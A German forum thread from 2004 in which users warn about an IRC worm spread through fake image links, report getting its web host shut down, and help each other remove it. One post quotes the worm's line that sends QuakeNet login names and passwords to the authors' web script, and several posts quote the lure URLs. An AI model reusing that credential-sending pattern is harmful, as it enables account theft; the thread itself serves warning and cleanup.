73%
22%
19%
11%
6%
Montag, 17. Mai 2004, 14:01
Neuer IRC Wurm
Zitat
IRC User aufgepasst, wieder einmal gibt es eine Vielzahl an neuen Würmern im Internet Relay Chat. Diese verweisen - scheinbar - auf ein lustiges oder kurioses Bild. Hinter diesem Link steckt allerdings ein Wurm, der den Auth des jeweiligen IRC-Users hackt und somit dem Entwickeler freie Kontrolle über die Channels, in denen der User Operatorstatus oder höher besitzt, verschafft. Außerdem verschickt der User ungewollt den Wurmlink an andere User im IRC. Hinter der Internetadresse des Links steckt allerdings immer eine .tk Endung, an der man den Wurm schon vorher identifizieren kann. Hier ein Beispiel:
(14:02:32) (*beispielname*) www.f*n-p*x.t*/blu*_f**h.j*g <----- looooooooooooooooool
Hier ein paar Regeln, mit denen man garantiert nicht auf IRC-Würmer reinfällt:
* auf URL-Endungen achten
* generell nie auf ominöse Links, die mit Aussagen wie "loooooooool" oder "rooooofl" versehen sind, klicken
* nach Möglichkeit nicht den Internet Explorer benutzen, sondern auf alternative Browser wie Opera oder Mozilla umsteigen, da Würmer meistens nur auf Sicherheitslücken im Internet Explorer ausgelegt sind
* das Gehirn einschalten beim Surfen im IRC
Mit diesen Tipps sollte ein sicheres Chatten und Surfen im IRC (wieder) möglich sein.
Entnommen von insacred.de
Passt lieber auf, User von #wmw wurden infiziert.
nyuuu
Montag, 17. Mai 2004, 14:56
Vor dem brauch wirklich keiner mehr Angst zu haben, der funktioniert schon seit Samstag 22:00 gar nicht mehr 
Ich hab exakt am Samstag um 20:00 Beschwerde bei Lycos eingereicht, dass die Seite: http://mitglied.lycos.de/funpixx/ geschlossen werden soll, weil sie gegen die AGBs verstösst und Lycos hat prompt gehandelt.
Ursprünglich hatte der Wurm die Q-Auth-Daten von Quakenet-Usern in der Form an die Entwickler des Wurms weitergeschickt: http://mitglied.lycos.de/funpixx/a.php?d=$encode(AUTHNAME,m)|$encode(AUTHPASS,m)
Da die Seite wie gesagt schon längst down ist, ist der Wurm unschädlich
BTW: Der Wurm nutzte die im Microsoft Security Bulletin MS04-013 veröffentlichte Sicherheitslücke aus. Das Problem ist seit mindestens 13. April 2004 bekannt und seitdem gibt es auch schon einen Patch bei Microsoft
[EDIT] Für Interessierte habe ich mal die zwei Dateien, die der Wurm im mIRC-Verzeichnis der Infizierten angelegt hat als Anhang beigefügt. Ich hoffe das verstösst jetzt nicht gegen irgendwelche Regeln
Ich hab exakt am Samstag um 20:00 Beschwerde bei Lycos eingereicht, dass die Seite: http://mitglied.lycos.de/funpixx/ geschlossen werden soll, weil sie gegen die AGBs verstösst und Lycos hat prompt gehandelt.
Ursprünglich hatte der Wurm die Q-Auth-Daten von Quakenet-Usern in der Form an die Entwickler des Wurms weitergeschickt: http://mitglied.lycos.de/funpixx/a.php?d=$encode(AUTHNAME,m)|$encode(AUTHPASS,m)
Da die Seite wie gesagt schon längst down ist, ist der Wurm unschädlich
BTW: Der Wurm nutzte die im Microsoft Security Bulletin MS04-013 veröffentlichte Sicherheitslücke aus. Das Problem ist seit mindestens 13. April 2004 bekannt und seitdem gibt es auch schon einen Patch bei Microsoft
[EDIT] Für Interessierte habe ich mal die zwei Dateien, die der Wurm im mIRC-Verzeichnis der Infizierten angelegt hat als Anhang beigefügt. Ich hoffe das verstösst jetzt nicht gegen irgendwelche Regeln
Warum kann ein Tag nicht 36 Stunden haben? ://
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (17. Mai 2004, 15:02)
Montag, 17. Mai 2004, 16:36
tja, einige haben wohl "merkwürdige Query's" von mir bekommen.
ich hatte selber eine gestern abend von silver|slash:
aufmerksam wurde ich um 04:07 uhr auf diese nachricht.
zu dem zeitpunkt sollte laut abi andy die url schon platt gewesen sein.
und jetzt kommt das ganz komische:
besagte dateien l.mrc und b.mrc wurden bei mir weder durch /unload ..., noch durch irgendwelche suchprogramme für wiren, würmer und trojaner gefunden.
auch eine suche mit filerecovery blieb erfolglos.
und jetzt?
ich hatte selber eine gestern abend von silver|slash:
Session Start: Sun May 16 22:38:51 2004
Session Ident: Silver|Slash
[[22:38]] Session Ident: Silver|Slash (~sei-ruhig@2aac9c3e.10eff834.cust.bluewin.ch)
[[22:38]] <Silver|Slash> www.fun-pix.tk/blub_fish.jpg <-- YOU!!!
Session Time: Mon May 17 00:00:00 2004
Session Close: Mon May 17 04:07:02 2004
aufmerksam wurde ich um 04:07 uhr auf diese nachricht.
zu dem zeitpunkt sollte laut abi andy die url schon platt gewesen sein.
und jetzt kommt das ganz komische:
besagte dateien l.mrc und b.mrc wurden bei mir weder durch /unload ..., noch durch irgendwelche suchprogramme für wiren, würmer und trojaner gefunden.
auch eine suche mit filerecovery blieb erfolglos.
und jetzt?
God is not on the side of the big battalions, but on the side those who shot best.
[Voltair]
[Voltair]
Montag, 17. Mai 2004, 17:07
öffne mal die mirc.ini und schick mir alles, was in der Sektion [rfiles] (standardmäßig letzte Sektion der INI) steht per Pm, plz, so dürften wir dem Schlingel mit Sicherheit auf die Schliche kommen
Ansonsten: Mir wurde schon öfter zugetragen, dass mein Removal-Command eine Fehlermeldung ausgibt, dass die Datei nicht existiert, allerdings hat das Command stehts seinen Zweck erfüllt. Trotzdem: Zur Sicherheit schick mir das einfach schnell per PM. Bin noch ca. 20min online, ansonsten schau ichs mir gegen 02:00 an, wenn ich zurück bin von der Arbeit.
Viren- & Trojanerscanner finden generell keine schädlichen IRC-Scripte
Wirklich zuverlässig ist da nur bei fortgeschritten Usern die Intuition und das Wissen, welche Dateien "normal" sind und welche schädlich. Wenn ich im kommenden Jahr vielleicht mal nen paar Wochen Zeit finde, wollte ich nen Scanner extra für IRC-Würmer schreiben, ob der Traum jemals wahr wird steht leider wegen akutem Zeitmangel, atm noch in den Sternen
Ansonsten: Mir wurde schon öfter zugetragen, dass mein Removal-Command eine Fehlermeldung ausgibt, dass die Datei nicht existiert, allerdings hat das Command stehts seinen Zweck erfüllt. Trotzdem: Zur Sicherheit schick mir das einfach schnell per PM. Bin noch ca. 20min online, ansonsten schau ichs mir gegen 02:00 an, wenn ich zurück bin von der Arbeit.
Orginal von Lucius
... noch durch irgendwelche suchprogramme für wiren, würmer und trojaner gefunden.
Viren- & Trojanerscanner finden generell keine schädlichen IRC-Scripte
Wirklich zuverlässig ist da nur bei fortgeschritten Usern die Intuition und das Wissen, welche Dateien "normal" sind und welche schädlich. Wenn ich im kommenden Jahr vielleicht mal nen paar Wochen Zeit finde, wollte ich nen Scanner extra für IRC-Würmer schreiben, ob der Traum jemals wahr wird steht leider wegen akutem Zeitmangel, atm noch in den Sternen
Warum kann ein Tag nicht 36 Stunden haben? ://
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (17. Mai 2004, 17:08)
Donnerstag, 20. Mai 2004, 12:11
So viel Aufwand wegen gar nichts! :>
Man muss einfach bissele aufpassen beim chatten. und schonmal von dem Wurm gehört: "http://ebay.tk/blablubb/jayjay.jpg <- Eine Nacht mit JayJay biete mit!"
Das is auch sowas...ebay.tk.
Also einfach in Zukunft besser aufpassen, bzw. Mozilla verwenden, dann hat man da keine Probs mehr!
@Abi_Andy:
Biste sicher, dass das klappt? Im Prinzip sind die Würmer ja alle gleich, aber die haben auch immer fast andere dateien, und wie willste die dann erkennen? Dann muss man ständig updaten...
MfG
Man muss einfach bissele aufpassen beim chatten. und schonmal von dem Wurm gehört: "http://ebay.tk/blablubb/jayjay.jpg <- Eine Nacht mit JayJay biete mit!"
Das is auch sowas...ebay.tk.
Also einfach in Zukunft besser aufpassen, bzw. Mozilla verwenden, dann hat man da keine Probs mehr!
@Abi_Andy:
Biste sicher, dass das klappt? Im Prinzip sind die Würmer ja alle gleich, aber die haben auch immer fast andere dateien, und wie willste die dann erkennen? Dann muss man ständig updaten...
MfG
http://zoryfl.wmw.cc
Donnerstag, 20. Mai 2004, 16:04
Original von zoryfl
So viel Aufwand wegen gar nichts! :>
Man muss einfach bissele aufpassen beim chatten. und schonmal von dem Wurm gehört: "http://ebay.tk/blablubb/jayjay.jpg <- Eine Nacht mit JayJay biete mit!"
Das is auch sowas...ebay.tk.
Also einfach in Zukunft besser aufpassen, bzw. Mozilla verwenden, dann hat man da keine Probs mehr!
@Abi_Andy:
Biste sicher, dass das klappt? Im Prinzip sind die Würmer ja alle gleich, aber die haben auch immer fast andere dateien, und wie willste die dann erkennen? Dann muss man ständig updaten...
MfG
Bei mir versteckt sich hinter "http://ebay.tk/blablubb/jayjay.jpg" nur die Seite http://www.hacker.cd mit ihren Dialern.
@Wurm-Scanner
Sicher muss man da ständig updaten, ist ja im Grunde auch nix anderes als nen Virenscanner, wenn du den nicht updates nutzt der nix, also regelmäßige Updates müssen schon sein, aber genau aus dem Grund ist das Projekt ja auch eher Zukunftsmusik, weil ich eh keine Zeit dafür habe, atm
Btw: Gibt/Gab auch schon Lücken im Mozilla, man ist nie 100%ig sicher, aber wenn du dein Win&IE aufm neuesten Stand hälst ist es auch nicht wesentlich unsicherer als irgendwelche "alternativen".
Warum kann ein Tag nicht 36 Stunden haben? ://
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Abi_Andy« (20. Mai 2004, 16:05)
Freitag, 21. Mai 2004, 11:34
Original von zoryfl
ähm..jo....das "/blablubb/ war auch nur zufällig gewählt, weil ich die ganze URL nit mehr wusste!
hm..ständig updaten...kostet eben verdammt viel Zeit...
Aber das musst du eben wissen!
MfG
er muss das ja nicht komplett alleine machen!
ich finds auch shcon gut wenn 10mann ständig auch der suche wären ...
einfach ne hp, wo man immer die neuesten irc würmer findet und eben wie man sie entfernt!
wärt doch schonmal was, oder ?
MfG wyros
Save The Planet - Kill Yourself
Ich bin um zu denken, ich denke um zu sein
Ich bin um zu denken, ich denke um zu sein
Dienstag, 1. Juni 2004, 22:04
Original von zoryfl
JO...nur das gibts teilweise schon.
Wenn du z.B. mal @Qnet #sicherheit joinst, dann kommen da oft Broadcasts oder amsgs oder channews, wie man den neuesten Wurm entfernt.
Nur ne Hp gibts afaik noch nit..
MfG
Der Channel ist g-lined angeblich "#sicherheit Cannot join channel (access denied on this server)"
Die Homepage www.irc-sicherheit.de
funktioniert einwandfrei
Greetz
MaxTPayne
Ähnliche Themen
-
Chat & IRC & Instant Messenger »-
Neuer IRC-Wurm: Deckard.jpg
(24. August 2004, 00:31)
-
- Plauder Forum »
-
neuer wurm??
(19. September 2004, 22:15)
-
- Allgemeines Forum »
-
Neuer ViruS =(
(3. Mai 2004, 13:07)
-
- Archiv: Betriebssysteme »
-
Neuer Wurm!!!
(1. Mai 2004, 13:24)
-
- Archiv: Betriebssysteme »
-
Windows Xp --- Windows Shut Down Automatisch --- Hilfe !
(7. September 2003, 12:55)